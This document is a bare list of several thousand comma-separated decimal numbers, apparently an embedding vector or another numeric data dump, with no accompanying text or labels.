0.012774406000971794, 0.02180071733891964, -0.0021267281845211983, 0.006278410088270903, 0.005671274848282337, -0.022165700793266296, -0.021337470039725304, -0.034336481243371964, -0.02961977757513523, 0.012423461303114891, 0.023695820942521095, -0.0029689965303987265, -0.012535763904452324, -0.007250528316944838, 0.015960989519953728, 0.024074843153357506, -0.023358915001153946, 0.010065109468996525, -0.011342549696564674, -0.026250703260302544, 0.005583538673818111, -0.01603117771446705, 0.025296131148934364, -0.003114638850092888, -0.00948254019021988, -0.014304527081549168, -0.016761144623160362, -0.04354528337717056, -0.004902704618871212, 0.011574173346161842, -0.013349956832826138, -0.01692959852516651, -0.004116587340831757, -0.03947431966662407, -0.016775181517004967, -0.04511751979589462, -0.004618439357727766, 0.012107610702514648, -0.006239806301891804, -0.031472768634557724, 0.0033059041015803814, 0.011468890123069286, -0.0016845370410010219, -0.005744973197579384, 0.0104932626709342, -0.011293417774140835, 0.012711236253380775, -0.0031672806944698095, -0.0029163549188524485, -0.013279767706990242, -0.011279379948973656, -0.020214445888996124, -0.019358139485120773, 0.017210353165864944, -0.03043396957218647, -0.00982646644115448, 0.010907378047704697, -0.009412351064383984, 0.015273136086761951, 0.00900525413453579, -0.012458555400371552, -0.003007600549608469, 0.002260087290778756, -0.01784205622971058, -0.0012914784019812942, -0.010795075446367264, 0.025633038952946663, 0.06827990710735321, -0.0008966650348156691, -0.009391293860971928, 0.004014813341200352, 0.005193989258259535, -0.001075647072866559, 0.009629936888813972, 0.016522500663995743, -0.02425733394920826, 0.007176829967647791, -0.000438242859672755, 0.0009124575881287456, 0.006804828066378832, -0.00683992262929678, 0.0017687639920040965, -0.013062180951237679, -0.0038568880409002304, 0.022151662036776543, 0.02196917124092579, 0.019133534282445908, 0.009756277315318584, 0.0067627145908772945, -0.01059152651578188, -0.03009706176817417, -0.00246889959089458, 0.00042135361582040787, -0.015680233016610146, -0.00900525413453579, -0.030377818271517754, -0.004397343844175339, -0.02347121760249138, -0.034813765436410904, -0.006415278650820255, -0.005011497996747494, -0.004130625165998936, 0.003891982603818178, 0.011475908569991589, -0.03164122253656387, -0.021267279982566833, -0.03896895796060562, -0.01736477017402649, 0.005299272947013378, -0.004302588291466236, -0.017926281318068504, 0.004092021379619837, 0.01074594259262085, -0.004063945729285479, 0.013125351630151272, -0.021435733884572983, -0.007903286255896091, -0.010303751565515995, -0.03691943734884262, 0.008794687688350677, -0.0015380174154415727, 0.012142704799771309, 0.019231798127293587, -0.0013616675278171897, 0.000654512841720134, -0.011988288722932339, 0.0022969364654272795, -0.017491109669208527, -0.018375491723418236, 0.026110325008630753, 0.016536539420485497, -0.014100979082286358, 0.011679457500576973, -0.01366580743342638, 0.017210353165864944, -0.039558544754981995, 0.03136046603322029, 0.015736384317278862, -0.007250528316944838, -0.012009345926344395, 0.006418788339942694, 0.01862817257642746, 0.01876855082809925, 0.006860979367047548, 0.020621541887521744, -0.012226931750774384, -0.006043276749551296, -0.02790716476738453, 0.02771063521504402, -0.021548036485910416, 0.004720213357359171, 0.00010139027290279046, 0.03428032994270325, -0.02664376236498356, 0.0018442171858623624, 0.0018266699044033885, 0.005379990208894014, 0.01137764472514391, 0.009763295762240887, 0.017069976776838303, -0.03231503814458847, 0.05202412232756615, 0.024173106998205185, 0.003504188032820821, 0.014880077913403511, -0.02640511840581894, -0.013272748328745365, 0.004513155668973923, 0.028721356764435768, 0.0033059041015803814, 0.0009738730150274932, -0.03169737383723259, 0.0056291613727808, 0.01088632084429264, 0.0165505763143301, -0.017041901126503944, 0.005516858771443367, -0.05974491685628891, -0.01572234556078911, -0.006681997328996658, 0.006608298514038324, -0.02081807143986225, 0.016368085518479347, 0.0036112263333052397, -0.0036463208962231874, 0.011047755368053913, -0.01872643642127514, 0.0042815315537154675, -0.0126270093023777, 0.03169737383723259, -0.009012273512780666, 0.016185594722628593, 0.006692525465041399, 0.00999492034316063, -0.007475133519619703, 0.016915559768676758, 0.016985749825835228, -0.0036322830710560083, 0.010914396494626999, 0.003356791101396084, 0.003263790626078844, 0.009026311337947845, -0.005429122596979141, 0.026910480111837387, 0.0005356301553547382, -0.01788416877388954, 0.002528560347855091, -0.02074788138270378, 0.0122830830514431, 0.006776752416044474, 0.019681008532643318, -0.008703441359102726, 0.003491905052214861, 0.003955152817070484, 0.011068812571465969, 0.0049062143079936504, 0.025941871106624603, -0.0014239602023735642, -0.009587823413312435, 0.020832108333706856, 0.027036819607019424, 0.00047026659012772143, -0.01998984068632126, 0.031753525137901306, -0.025703229010105133, 0.011686475947499275, 0.03237118944525719, -0.008078759536147118, -0.0026706932112574577, -0.02156207524240017, -0.00027264058007858694, 0.046998586505651474, 0.02821599692106247, -0.010781037621200085, 0.007531284354627132, -0.023358915001153946, -0.004997460171580315, 0.014753737486898899, 0.020733844488859177, 0.006064333487302065, 0.025871682912111282, -0.0048535726964473724, 0.021281318739056587, 0.0026162967551499605, 0.010289713740348816, 0.004014813341200352, 0.002653145929798484, -0.011553117074072361, 0.007306679617613554, 0.017041901126503944, 0.002874241443350911, 0.015357363037765026, -0.014809888787567616, 0.0016125933034345508, -0.002200426533818245, -0.04062541946768761, 0.011651381850242615, 0.003379602450877428, -0.004000775516033173, 0.0036112263333052397, -0.005576519761234522, -0.012563839554786682, -0.01318852137774229, -0.022460494190454483, -0.027205273509025574, 0.00280229770578444, 0.00930004846304655, 0.012023383751511574, -0.03183775022625923, 0.01073190476745367, 0.02845463901758194, -0.032736171036958694, -0.03551565855741501, -0.002621560823172331, 0.00341996131464839, -0.011826854199171066, 0.000576866208575666, 0.0039235674776136875, 0.013750034384429455, -0.0048430440947413445, -0.0006904847105033696, 0.01371493935585022, -0.022081473842263222, 0.007257547229528427, 0.003263790626078844, 0.024538090452551842, -0.024145031347870827, -0.004123606253415346, 0.02842656336724758, -0.00827528815716505, -0.03301692754030228, 0.015989065170288086, 0.04702666029334068, -0.0035971885081380606, -0.03105163387954235, -0.035122599452733994, 0.017968395724892616, -0.01561004389077425, -0.01059152651578188, 0.004492098931223154, 0.011349569074809551, 0.014992380514740944, -0.0025566359981894493, 0.00386390695348382, 0.02296585589647293, 0.003930586390197277, 0.028777508065104485, 0.0036147357895970345, -0.018347416073083878, -0.005850256886333227, -0.01678922027349472, -0.013609656132757664, -0.0002776854089461267, -0.003639301983639598, -0.02299393154680729, -0.004786892794072628, 0.014304527081549168, 0.009082462638616562, 0.0077980030328035355, 0.006601279601454735, -0.007790984120219946, -0.0013686864404007792, 0.0436856634914875, 0.0037761705461889505, 0.008226156234741211, 0.02084614709019661, 0.000643107108771801, -0.010774018242955208, -0.0069311680272221565, 0.007538303267210722, -0.02466442994773388, -0.02695259265601635, 0.01972312107682228, -0.02992860972881317, -0.002035482320934534, 0.02811773121356964, -0.003549810964614153, 0.006232787389308214, -0.010451149195432663, -0.0232044979929924, -0.03203428164124489, 0.002260087290778756, 0.015329287387430668, 0.024524051696062088, 0.0036638681776821613, -0.0004935167380608618, -0.0075032091699540615, -0.00420432398095727, 0.020958449691534042, 0.008724498562514782, -0.010928434319794178, 0.007110150530934334, -0.0032427338883280754, -0.03312923014163971, -0.016761144623160362, -0.030012836679816246, 0.002367125591263175, 0.027078934013843536, -0.019301988184452057, -0.010409035719931126, -0.012556820176541805, -0.0039972662925720215, 0.011511003598570824, -0.00342522538267076, 0.0014748473186045885, 0.02020040713250637, -0.028300223872065544, 0.00927899219095707, 0.015118720009922981, 0.03026551567018032, 0.007783965207636356, -0.012781425379216671, 0.00526417838409543, 0.006734638940542936, -0.0005036063957959414, 0.012444517575204372, 0.007594454567879438, 0.0013371013337746263, -0.011047755368053913, 0.0041130781173706055, -0.013820222578942776, -0.018979117274284363, -0.014711624011397362, 0.005390518810600042, -0.014304527081549168, 0.0007716407999396324, 0.0024618806783109903, -0.004439457319676876, -0.010823151096701622, 0.0018845758168026805, -0.03596486523747444, -0.008113853633403778, -0.0245661661028862, 0.013504371978342533, -0.001355525921098888, 0.014964304864406586, -0.03910933434963226, 0.03107970952987671, 0.030658574774861336, 0.02811773121356964, -0.0037375667598098516, 0.01817896217107773, -0.027682559564709663, 0.016915559768676758, -0.01259191520512104, -0.016129443421959877, 0.006173126399517059, -0.04854274541139603, 0.006113465875387192, -0.013420145027339458, 0.003927077166736126, 0.017589375376701355, 0.010001938790082932, 0.0005544934538193047, 0.016536539420485497, -0.0022793891839683056, -0.05690927803516388, 0.010781037621200085, -0.01991965062916279, 0.007819059304893017, 0.0060818810015916824, 0.020256558433175087, 0.01638212241232395, -0.0006931168027222157, -0.010879302397370338, 0.005516858771443367, -0.004355230368673801, -0.0019126514671370387, -0.005815162323415279, 0.006043276749551296, -0.01808069832623005, 0.01181983482092619, -0.003398904576897621, 0.0015467910561710596, 0.006713582202792168, -0.01419222541153431, -0.007475133519619703, -0.014009733684360981, 0.005039573647081852, 0.00633807061240077, -0.0005707246600650251, -0.016831332817673683, 0.0020302182529121637, -0.009082462638616562, -0.016564615070819855, -0.003944624215364456, 0.015876762568950653, 0.0007694474188610911, -0.005053611472249031, -0.020045991986989975, 0.01869836077094078, -0.010331827215850353, 0.012339234352111816, -0.012619989924132824, -0.0012581386836245656, 0.007043470628559589, -0.0015906592598184943, 0.015918875113129616, 0.018108773976564407, 0.013132370077073574, 0.034785691648721695, 0.0013371013337746263, 0.016354046761989594, 0.027219312265515327, -0.01784205622971058, -0.03385919705033302, -0.019498517736792564, 0.0382109172642231, 0.00963695626705885, -0.005274706985801458, 0.004706175532191992, 0.008247212506830692, -0.000050475795433158055, -0.01316746510565281, -0.010809113271534443, 0.009054386988282204, 0.004278022330254316, 0.004053417593240738, -0.009398313239216805, -0.0011028454173356295, -0.00864729005843401, -0.026699913665652275, -0.013230634853243828, -0.0007361076422967017, 0.01838953047990799, 0.004011304117739201, 0.005632671061903238, -0.0005123800365254283, 0.017252467572689056, 0.00029830343555659056, -0.006102937273681164, -0.010654697194695473, -0.0024338052608072758, 0.01784205622971058, -0.016592690721154213, -0.0049097235314548016, -0.0011440814705565572, -0.0024180125910788774, -0.0015309985028579831, 0.007264566142112017, -0.0011019679950550199, 0.023358915001153946, -0.010423073545098305, -0.013448220677673817, 0.007826078683137894, -0.015329287387430668, -0.0026303345803171396, 0.02933902107179165, 0.015245060436427593, -0.014339622110128403, -0.009987900964915752, -0.021337470039725304, -0.012444517575204372, -0.009524653665721416, -0.023695820942521095, -0.01829126477241516, -0.04056926816701889, -0.01896508038043976, 0.01422731950879097, 0.017069976776838303, 0.013651769608259201, 0.005351914558559656, 0.004632477182894945, -0.0144168296828866, -0.011195152997970581, -0.005548444110900164, 0.013328899629414082, 0.0037621327210217714, -0.0018898400012403727, 0.026264740154147148, 0.01259191520512104, 0.02081807143986225, 0.015946950763463974, 0.01124428492039442, -0.002254822989925742, 0.013553504832088947, -0.0005549321649596095, 0.034336481243371964, -0.001981085864827037, -0.0032269414514303207, -0.008184042759239674, 0.00493779918178916, 0.009307067841291428, -0.022713175043463707, -0.01052835676819086, -0.017069976776838303, -0.024594241753220558, -0.019596781581640244, 0.0015029229689389467, 0.007783965207636356, 0.0042920601554214954, -0.0037270383909344673, 0.04483676329255104, -0.001032656291499734, -0.0007387396763078868, 0.002309219678863883, 0.01035288441926241, 0.02153399959206581, 0.00038538171793334186, 0.013504371978342533, 0.008556044660508633, -0.004285041242837906, -0.0030777896754443645, -0.0028268638998270035, 0.0055098398588597775, -0.00506764929741621, -0.044162947684526443, -0.008064721710979939, -0.0004728986823465675, -0.005709878634661436, -0.003344508120790124, -0.0024548617657274008, -0.014557207934558392, -0.003142714500427246, -0.00017163415031973273, 0.006197692826390266, -0.008001551032066345, 0.0014573000371456146, -0.007531284354627132, -0.018951041623950005, 0.008303363807499409, -0.0008242825861088932, 0.00009596158633939922, -0.010317789390683174, -0.0048676105216145515, -0.004348211456090212, -0.014199243858456612, 0.003518225857988, -0.013792147859930992, 0.0038358313031494617, 0.0009194765007123351, 0.004379796329885721, -0.015778496861457825, 0.0011124963639304042, -0.018908929079771042, -0.015427552163600922, -0.02194109559059143, 0.014669510535895824, 0.007819059304893017, -0.00982646644115448, -0.017420921474695206, 0.01852990873157978, -0.012149724178016186, 0.01958274282515049, -0.004597382619976997, -0.008212118409574032, -0.012142704799771309, 0.027949277311563492, -0.026896441355347633, -0.0009150896803475916, 0.023878313601017, 0.007587435655295849, 0.00023184319434221834, -0.0144168296828866, -0.0116022489964962, 0.019400252029299736, -0.012774406000971794, 0.003972699865698814, -0.009552729316055775, -0.002637353492900729, 0.002640862949192524, -0.00876661203801632, 0.0022565778344869614, 0.006450373213738203, -0.011953194625675678, -0.0014204508624970913, -0.001528366468846798, -0.004551759455353022, -0.001995123689994216, 0.020354822278022766, 0.0007795370765961707, 0.0018705381080508232, 0.004678099881857634, -0.004990441258996725, 0.00864729005843401, 0.003965680953115225, 0.00880170613527298, 0.0011186378542333841, -0.012521726079285145, 0.0038253029342740774, -0.014241357333958149, -0.00936321821063757, 0.00525365024805069, 0.010479224845767021, -0.0037937178276479244, 0.009910693392157555, -0.008205099031329155, 0.018263189122080803, -0.0030005816370248795, 0.01259191520512104, -0.00437628710642457, 0.01729458011686802, -0.012402404099702835, 0.00807174015790224, -0.02575938031077385, -0.029704004526138306, -0.0011177605483680964, 0.024313485249876976, 0.02399061620235443, -0.02081807143986225, -0.007580416742712259, 0.011798778548836708, -0.020930374041199684, 0.009707145392894745, -0.000994929694570601, 0.0018705381080508232, 0.032399263232946396, -0.0011054774513468146, -0.0012809500331059098, -0.026770101860165596, -0.011665419675409794, -0.014795850962400436, -0.0005233470583334565, 0.021407658234238625, 0.004351720679551363, 0.004464023280888796, -0.013427164405584335, -0.02623666450381279, -0.01427645143121481, -0.0038042461965233088, 0.007819059304893017, -0.01817896217107773, -0.010247600264847279, 0.01685940846800804, 0.012226931750774384, 0.012493650428950787, -0.02504345215857029, 0.017420921474695206, 0.0144168296828866, -0.002797033404931426, -0.015652157366275787, 0.002425031503662467, 0.009082462638616562, 0.019933689385652542, -0.0405973456799984, 0.006064333487302065, 0.0012897236738353968, 0.006145050749182701, 0.014950267039239407, 0.0032830925192683935, 0.0014072903431952, 0.0006782016716897488, 0.027486030012369156, -0.016704993322491646, -0.008949102833867073, -0.009959825314581394, -0.008963140659034252, -0.0010677508544176817, -0.0017836791230365634, -0.01351139135658741, 0.0011353078298270702, 0.009433407336473465, -0.001355525921098888, 0.005453689023852348, -0.007875210605561733, 0.012907765805721283, 0.017378807067871094, 0.019737159833312035, 0.0221797376871109, -0.018586060032248497, 0.0022355210967361927, -0.0032918662764132023, -0.0036603587213903666, 0.02224992774426937, -0.019259873777627945, -0.011195152997970581, 0.010738924145698547, 0.03183775022625923, 0.009328124113380909, -0.0011791759170591831, 0.003667377633973956, 0.0022214832715690136, 0.011875986121594906, -0.009601861238479614, 0.012528744526207447, 0.00402534194290638, 0.008696422912180424, 0.009742239490151405, 0.018824702128767967, 0.01122322864830494, -0.029423248022794724, -0.0017354241572320461, -0.012549801729619503, 0.002998827025294304, -0.018824702128767967, -0.005664255935698748, -0.00598010653629899, -0.005615123547613621, 0.006566185038536787, 0.014269432984292507, -0.019877538084983826, -0.002800542861223221, -0.013328899629414082, 0.004990441258996725, -0.002321502659469843, 0.010766999796032906, -0.015231022611260414, 0.0007137348293326795, -0.00982646644115448, 0.00825423188507557, 0.018277227878570557, -0.01743495836853981, -0.06154175475239754, 0.00016911173588596284, 0.004576325882226229, 0.010163373313844204, 0.019231798127293587, -0.002675957279279828, -0.006636374164372683, -0.0048956857062876225, 0.01900719292461872, -0.009728201664984226, 0.020186370238661766, 0.012065497227013111, 0.025225942954421043, -0.008478837087750435, 0.011651381850242615, 0.029282869771122932, -0.014837964437901974, 0.010472205467522144, 0.002932147355750203, 0.014669510535895824, 0.003748095128685236, -0.009180727414786816, 0.005095724482089281, 0.000715050904545933, -0.011595230549573898, -0.0024057296104729176, 0.008815743960440159, -0.010022995993494987, -0.004478061106055975, 0.004646515008062124, 0.0038884731475263834, -0.007201395928859711, -0.01784205622971058, -0.003007600549608469, -0.006776752416044474, 0.01829126477241516, 0.014030789956450462, 0.011911081150174141, 0.009721183218061924, -0.000019960009012720548, -0.0034357537515461445, 0.003397149732336402, -0.014472980983555317, -0.01829126477241516, 0.0003355913795530796, 0.025801492854952812, 0.004657043144106865, -0.01161628682166338, 0.003491905052214861, -0.007762908469885588, 0.013090256601572037, 0.005811653099954128, 0.017799941822886467, -0.01614348031580448, 0.013595618307590485, -0.0023372950963675976, -0.018824702128767967, -0.01073190476745367, -0.006836412940174341, 0.009791371412575245, -0.013623693957924843, -0.013076218776404858, -0.005762520711869001, 0.016354046761989594, -0.02296585589647293, 0.013041124679148197, -0.006236296612769365, 0.008001551032066345, 0.021365545690059662, 0.02013021893799305, -0.01490815356373787, -0.005927464924752712, 0.014781813137233257, 0.007945399731397629, -0.0030812991317361593, -0.02483288384974003, -0.009868579916656017, 0.015357363037765026, -0.001124779460951686, -0.004028851166367531, -0.006376674864441156, 0.004832515958696604, -0.021898983046412468, -0.009433407336473465, 0.017968395724892616, 0.01848779432475567, 0.0023337858729064465, -0.014599321410059929, 0.00736984983086586, 0.0025969946291297674, -0.0061485604383051395, -0.009138613939285278, -0.008773630484938622, 0.021477848291397095, -0.020832108333706856, -0.0012546292273327708, 0.010086165741086006, -0.0054571982473134995, 0.03851974755525589, 0.010163373313844204, 0.016915559768676758, -0.012156742624938488, -0.012444517575204372, -0.002035482320934534, -0.014627397060394287, 0.025675153359770775, -0.013420145027339458, 0.0025987494736909866, -0.0003412942460272461, 0.018740475177764893, 0.014781813137233257, -0.009552729316055775, 0.005888861138373613, 0.01872643642127514, 0.003218167694285512, -0.03231503814458847, 0.013455240055918694, -0.007657624781131744, 0.007271585054695606, -0.002711051842197776, -0.025633038952946663, -0.013490334153175354, 0.005860785488039255, 0.022390305995941162, 0.010409035719931126, -0.0006856592372059822, 0.023653708398342133, 0.01021952461451292, -0.025885719805955887, -0.002275879727676511, -0.001138817286118865, 0.027275463566184044, -0.026601647958159447, 0.00666094059124589, -0.017182277515530586, -0.008570082485675812, 0.01681729592382908, -0.01003001444041729, 0.0003103671770077199, -0.010121260769665241, -0.017870131880044937, -0.009573785588145256, -0.011742627248167992, -0.01907738298177719, 0.01173560880124569, -0.03043396957218647, -0.006801318377256393, 0.010802093893289566, 0.014402791857719421, 0.006597770377993584, 0.005095724482089281, 0.013097275979816914, -0.014753737486898899, -0.011840892024338245, -0.0009510615491308272, -0.004723722580820322, -0.007103131618350744, -0.0020056520588696003, -0.009580804966390133, 0.0037094911094754934, -0.008324421010911465, 0.002307464834302664, -0.04132730886340141, -0.020649617537856102, -0.00880170613527298, 0.0012300630332902074, 0.003993756603449583, -0.0016801502788439393, -0.02244645729660988, 0.009756277315318584, -0.007348793093115091, -0.01896508038043976, 0.0015608288813382387, -0.012058477848768234, -0.005755501799285412, -0.014753737486898899, 0.0061345226131379604, 0.015104682184755802, 0.021828792989253998, 0.004628967493772507, -0.02933902107179165, 0.003088318044319749, -0.010752961970865726, -0.017154201865196228, -0.0028988076373934746, 0.018642211332917213, 0.006703054066747427, -0.016564615070819855, -0.006871507503092289, -0.0050992341712117195, -0.027149122208356857, -0.0039340960793197155, 0.013160445727407932, -0.0023636161349713802, -0.031192012131214142, 0.0004829883691854775, -0.014030789956450462, 0.0074400389567017555, 0.03798631206154823, -0.00016933107690420002, -0.003200620412826538, 0.008282307535409927, -0.007524265442043543, 0.008773630484938622, 0.01907738298177719, -0.0031637712381780148, -0.012402404099702835, 0.016396161168813705, 0.03571218624711037, 0.01626981981098652, -0.001945991301909089, -0.007320717442780733, -0.005106253083795309, -0.025492660701274872, 0.021407658234238625, 0.005615123547613621, 0.0038709258660674095, 0.01294987928122282, -0.009286010637879372, 0.037789780646562576, 0.008113853633403778, -0.01562408171594143, -0.0027321085799485445, -0.011174095794558525, 0.02241838164627552, 0.016045216470956802, -0.01120919082313776, 0.012458555400371552, 0.027963316068053246, -0.014472980983555317, 0.00894208438694477, 0.0018705381080508232, 0.004986931569874287, -0.011040736921131611, -0.014290489256381989, -0.028033504262566566, 0.020565390586853027, -0.0014581774594262242, 0.020172331482172012, -0.01457124575972557, -0.010142317041754723, 0.004478061106055975, -0.007636568043380976, -0.019259873777627945, 0.007776946295052767, -0.0001328108337474987, -0.028412526473402977, -0.02630685456097126, -0.014922191388905048, 0.00824019405990839, 0.0018477266421541572, -0.006359127350151539, 0.013230634853243828, 0.019540630280971527, -0.009426388889551163, -0.0021758603397756815, 0.005794105585664511, -0.028019467368721962, 0.017224391922354698, 0.009117556735873222, 0.0049202521331608295, -0.018277227878570557, -0.0058397287502884865, 0.01489411573857069, -0.031781598925590515, 0.0018670286517590284, -0.025225942954421043, 0.02268509939312935, -0.006860979367047548, 0.0001636282104300335, -0.005727426148951054, -0.02804754301905632, -0.0077980030328035355, 0.004249946679919958, -0.0038042461965233088, 0.005436141509562731, 0.007587435655295849, 0.017378807067871094, 0.008640271611511707, 0.01920372247695923, 0.008703441359102726, 0.0037235289346426725, -0.0069943382404744625, 0.014880077913403511, 0.013371013104915619, -0.005492292810231447, 0.015216984786093235, -0.040653493255376816, -0.015413514338433743, 0.01815088652074337, -0.016368085518479347, -0.01664884202182293, -0.004481570329517126, 0.00827528815716505, 0.004327154718339443, 0.02394850179553032, -0.017013825476169586, 0.00029940015519969165, -0.010703829117119312, 0.0004500872455537319, 0.007706757169216871, 0.012255007401108742, 0.025029413402080536, 0.011391681618988514, 0.006436335388571024, -0.021140940487384796, -0.017799941822886467, -0.0015792534686625004, 0.010275675915181637, -0.007064527366310358, 0.027219312265515327, -0.015890799462795258, 0.003514716401696205, 0.00360420742072165, -0.011033717542886734, 0.01972312107682228, 0.028496751561760902, -0.0016345273470506072, -0.030377818271517754, -0.00934918038547039, -0.022067435085773468, -0.002223238116130233, -0.026657799258828163, -0.0072084148414433, 0.002698768861591816, -0.000050914473831653595, 0.0018477266421541572, 0.0063275424763560295, -0.002874241443350911, -0.01610136777162552, 0.008492874912917614, -0.003797227283939719, -0.021814756095409393, 0.0008602545130997896, -0.0068785264156758785, 0.0060327486135065556, 0.003290111431851983, -0.003748095128685236, 0.017210353165864944, 0.019021231681108475, 0.007868192158639431, -0.010458167642354965, 0.02091633528470993, 0.015946950763463974, 0.011932137422263622, 0.012662103399634361, -0.0011423267424106598, -0.016129443421959877, 0.02914249151945114, -0.0006075739511288702, 0.010830169543623924, -0.008001551032066345, -0.011777722276747227, 0.011370625346899033, 0.010584508068859577, -0.010626621544361115, 0.0023864274844527245, -0.01600310206413269, -0.01719631627202034, 0.004169229418039322, 0.025169791653752327, 0.004014813341200352, -0.002540843328461051, -0.014795850962400436, 0.00864729005843401, -0.002961977617815137, -0.023808123543858528, -0.005429122596979141, -0.006074862089008093, 0.0062749008648097515, 0.003927077166736126, -0.025436509400606155, 0.0013616675278171897, -0.03124816343188286, 0.0020512747578322887, -0.003111129393801093, -0.01822107657790184, -0.002044255845248699, 0.017392845824360847, 0.020214445888996124, 0.01848779432475567, -0.009594842791557312, -0.016438273712992668, 0.018501833081245422, 0.012746330350637436, -0.01831934042274952, 0.010107222944498062, -0.015174871310591698, -0.016325971111655235, 0.031107785180211067, 0.012072515673935413, 0.014767775312066078, -0.016283858567476273, 0.023794086650013924, 0.026868365705013275, -0.0005544934538193047, 0.003828812390565872, -0.013820222578942776, -0.015483703464269638, -0.009833484888076782, 0.010703829117119312, -0.023485254496335983, 0.012753349728882313, -0.007489171344786882, -0.004348211456090212, -0.009433407336473465, 0.007812040857970715, -0.0062117306515574455, 0.006215239875018597, -0.011328511871397495, 0.017729753628373146, -0.00803664606064558, -0.0009466747287660837, 0.011181115172803402, -0.0028444111812859774, -0.010107222944498062, 0.002124973339959979, 0.02194109559059143, 0.00030576103017665446, -0.013539467006921768, -0.03189390152692795, -0.011454852297902107, 0.016466349363327026, -0.005664255935698748, 0.007418982218950987, -0.0011028454173356295, -0.026348967105150223, 0.018852777779102325, 0.004327154718339443, -0.0007115414482541382, -0.0008019098313525319, 0.007355812005698681, 0.016592690721154213, 0.030012836679816246, -0.03453300893306732, -0.0016889239195734262, -0.02538035809993744, 0.005355424247682095, 0.02060750313103199, 0.006050295662134886, 0.005843237973749638, -0.013090256601572037, -0.003621754702180624, -0.013272748328745365, 0.00649950560182333, 0.001375705236569047, 0.009271972812712193, -0.0021355017088353634, -0.00825423188507557, -0.0048570819199085236, -0.010479224845767021, -0.006780261639505625, 0.001986349932849407, -0.008387590758502483, 0.011496965773403645, -0.011146020144224167, -0.004723722580820322, 0.011686475947499275, 0.00037836283445358276, 0.011791759170591831, 0.008661327883601189, -0.005236102733761072, 0.020902298390865326, 0.026082249358296394, -0.004829006269574165, 0.0077348328195512295, 0.014199243858456612, 0.004878138657659292, 0.01817896217107773, -0.019568705931305885, -0.024678468704223633, 0.0028566941618919373, 0.017996471375226974, -0.020003877580165863, -0.000017382755686412565, -0.007819059304893017, 0.004481570329517126, 0.007390906568616629, 0.02623666450381279, 0.005751992110162973, 0.012991992756724358, -0.014402791857719421, -0.005730935372412205, -0.035403355956077576, -0.003786698915064335, 0.008373552933335304, -0.014171168208122253, 0.011167077347636223, 0.0025075036101043224, -0.011426776647567749, -0.017898205667734146, -0.008506912738084793, 0.00014608094352297485, 0.0011493456549942493, 0.02132343128323555, 0.012977954931557178, 0.012619989924132824, -0.00914563238620758, 0.010521338321268559, -0.01144783291965723, -0.0027935239486396313, 0.00034261029213666916, -0.010717866942286491, 0.030827028676867485, -0.012051459401845932, 0.007096112705767155, -0.021519960835576057, -0.012016364373266697, 0.004646515008062124, 0.008759592659771442, 0.027556220069527626, -0.0007251405622810125, -0.002711051842197776, -0.002067067427560687, -0.023022007197141647, -0.0042394185438752174, -0.003639301983639598, -0.011833872646093369, -0.003177809063345194, -0.01110390666872263, 0.008092797361314297, 0.012135686352849007, 0.014950267039239407, -0.0019196703797206283, -0.01192511897534132, -0.00004570513192447834, -0.019470442086458206, 0.028370412066578865, -0.01869836077094078, 0.015596006065607071, -0.004769345745444298, -0.012970935553312302, 0.010303751565515995, -0.004425419494509697, 0.023429103195667267, -0.009215821512043476, 0.008177023380994797, 0.00890699028968811, 0.008282307535409927, 0.00629595760256052, -0.006236296612769365, 0.026250703260302544, 0.012374328449368477, 0.0054571982473134995, 0.0017713960260152817, -0.006899583153426647, 0.0101493364199996, 0.007433020044118166, 0.011595230549573898, 0.027865050360560417, 0.006717091426253319, 0.011482927948236465, -0.013750034384429455, 0.00807174015790224, 0.017729753628373146, 0.027780823409557343, 0.0038217934779822826, -0.00651705265045166, -0.017420921474695206, -0.010008958168327808, -0.00013961040531285107, -0.0017556034727022052, 0.0063170138746500015, -0.027486030012369156, 0.00456228805705905, -0.0018442171858623624, 0.0252540186047554, 0.017084013670682907, -0.03091125562787056, -0.004407871980220079, 0.0016845370410010219, 0.017589375376701355, -0.0031356955878436565, 0.01172157097607851, 0.009152651764452457, -0.0072084148414433, -0.01490815356373787, 0.008984197862446308, -0.007071546278893948, 0.005376480985432863, -0.006152069661766291, 0.01965293288230896, 0.007650605868548155, -0.018852777779102325, 0.0010045807575806975, -0.017968395724892616, 0.025324206799268723, -0.011672438122332096, -0.0030672613065689802, -0.013027086853981018, -0.01767360232770443, 0.015960989519953728, -0.01283055730164051, -0.004246437456458807, 0.015090644359588623, 0.010394997894763947, 0.007615511305630207, 0.018754512071609497, 0.013644750230014324, -0.013813204132020473, 0.005769539624452591, 0.0094685023650527, -0.04711088910698891, -0.033831119537353516, -0.01626981981098652, 0.013413126580417156, -0.00031475399737246335, 0.004077983554452658, 0.009763295762240887, 0.0012993747368454933, 0.008464799262583256, -0.015427552163600922, -0.00528874434530735, -0.013090256601572037, 0.018782587721943855, -0.00685045076534152, 0.014367697760462761, -0.007071546278893948, 0.006643393076956272, 0.0029163549188524485, -0.008162985555827618, 0.006720601115375757, 0.014627397060394287, 0.004439457319676876, -0.0025232962798327208, 0.002546107629314065, -0.010774018242955208, 0.007517246995121241, -0.013490334153175354, 0.010689791291952133, 0.02542247250676155, -0.008534988388419151, -0.016999786719679832, -0.01298497337847948, 0.00031146389665082097, -0.004723722580820322, 0.029086340218782425, -0.014557207934558392, -0.004551759455353022, 0.011482927948236465, -0.0046008918434381485, 0.015497741289436817, 0.011946175247430801, 0.003446282120421529, 0.012851614505052567, 0.018754512071609497, 0.004411381669342518, -0.009243897162377834, 0.004860591609030962, -0.008689403533935547, -0.011033717542886734, 0.0015529326628893614, 0.013897431083023548, 0.013539467006921768, 0.012528744526207447, 0.016873447224497795, -0.023007968440651894, -0.007524265442043543, 0.0017854338511824608, -0.00721543375402689, 0.000764183234423399, -0.00808577798306942, 0.02153399959206581, 0.007776946295052767, -0.010521338321268559, 0.00013467522512655705, 0.03265194222331047, -0.008549025282263756, -0.019133534282445908, 0.010858245193958282, 0.0019968783017247915, 0.006229277700185776, 0.003562093945220113, 0.0023302764166146517, 0.05278216302394867, 0.004056926816701889, -0.012240969575941563, -0.014072903431952, -0.020172331482172012, 0.010823151096701622, -0.004425419494509697, -0.005590557586401701, -0.01426241360604763, 0.002563654910773039, -0.0018003489822149277, 0.00805068388581276, -0.001865273923613131, -0.0024794279597699642, -0.012198856100440025, 0.010430091992020607, 0.009229859337210655, -0.019428327679634094, -0.014753737486898899, -0.00039941954310052097, -0.0049588559195399284, 0.008233174681663513, -0.04638092219829559, 0.005730935372412205, -0.017519185319542885, -0.016017140820622444, -0.00788222998380661, -0.025885719805955887, 0.021576112136244774, 0.001900368370115757, 0.003818284021690488, -0.011265342123806477, -0.013764072209596634, -0.02596994675695896, 0.02241838164627552, 0.011139001697301865, 0.004667571745812893, -0.012760368175804615, -0.0061380318365991116, 